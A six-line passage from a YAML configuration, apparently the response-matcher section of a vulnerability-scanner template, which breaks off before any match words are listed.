20 | matchers:
21 | - type: word
22 | part: body
23 | condition: or
24 | words:
25 | - '